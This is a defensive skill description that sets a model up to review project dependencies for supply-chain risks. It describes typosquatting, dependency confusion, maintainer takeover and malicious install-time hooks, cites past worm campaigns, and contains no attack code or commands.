supply-chain-security
Supply-Chain Security Scanner
This skill turns the model into a dependency reviewer. Read the manifests, lockfiles, install scripts, and the dependency diff; walk the detection passes; report each supply-chain risk with a severity and a concrete fix. No tools to install, no package to run, no registry to phone — the analysis is the model reading what's on disk and in the diff.
A dependency is the one thing in your project you didn't write and didn't review, running with your full privileges. The defender's problem is that it looks legitimate: the largest npm compromise in history rode chalk and debug (2 billion weekly downloads) through a phished maintainer, and the Shai-Hulud worm backdoored ~800 packages by republishing them under stolen tokens. Popularity is not safety. The moment to catch this is when a dependency is added or changed — that is what this skill reviews.
Mental model
A new or changed dependency runs code from a stranger twice: once at install time (lifecycle scripts — on your laptop and your CI runner, before a single line is reviewed) and again at runtime (in your app, your users' browsers, your servers). Two questions decide whether it is safe:
- Identity — is this the package you meant, from who you think published it? Defeated by typosquatting (a misspelling of a popular name), slopsquatting (a plausible name an AI hallucinated and an attacker pre-registered), dependency / namespace confusion (an internal name claimed on a public registry), and maintainer account takeover (a trusted name, a stolen token).
- Behavior — does it do something a library of its stated purpose has no reason to do? Especially at install time. Defeated by malicious lifecycle scripts, obfuscated payloads, credential harvesting, exfiltration, persistence, and self-propagation.
The install-time hook is the crown jewel. It executes before any code review, on developer machines and CI runners, with full environment and token access — which is exactly why every major worm (Shai-Hulud, the nx s1ngularity attack, the June 2026 binding.gyp campaign) targets install time. Most land in preinstall / postinstall; the binding.gyp worm bypasses those hooks entirely by tricking node-gyp into running arbitrary shell during a fake native build. A package can be perfectly functional and still own your machine the instant you install it.
When you cannot confirm a package's identity, or cannot explain what its install script does, treat it as untrusted and flag it. The cost of a false positive is a held PR and a few minutes. The cost of a false negative is every credential on the machine and in CI — and your own packages republished as the next link in the worm. This asymmetry governs every judgment call below.